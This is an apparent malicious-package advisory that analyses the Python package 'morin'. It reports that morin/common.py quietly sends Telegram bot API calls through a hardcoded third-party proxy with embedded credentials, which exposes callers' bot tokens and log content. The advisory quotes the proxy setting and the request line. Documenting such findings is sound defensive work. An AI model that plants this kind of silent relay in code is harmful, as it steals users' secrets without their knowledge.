MAL-2026-4757

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (37c27d25a4c203cbb89156281fbacc7feb424a09eaa296f7c3dedff860891f1f) morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (`proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}`) and unconditionally routes all Telegram API calls through it via `requests.get(url, params=params, proxies=proxies, timeout=15)` where `url=https://api.telegram.org/bot{bot_token}/sendMessage`. Every Clickhouse/connector class in the package funnels through `Common.log_func` / `Common.send_logs`, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host. The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic — including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker-or-third-party-controlled destination.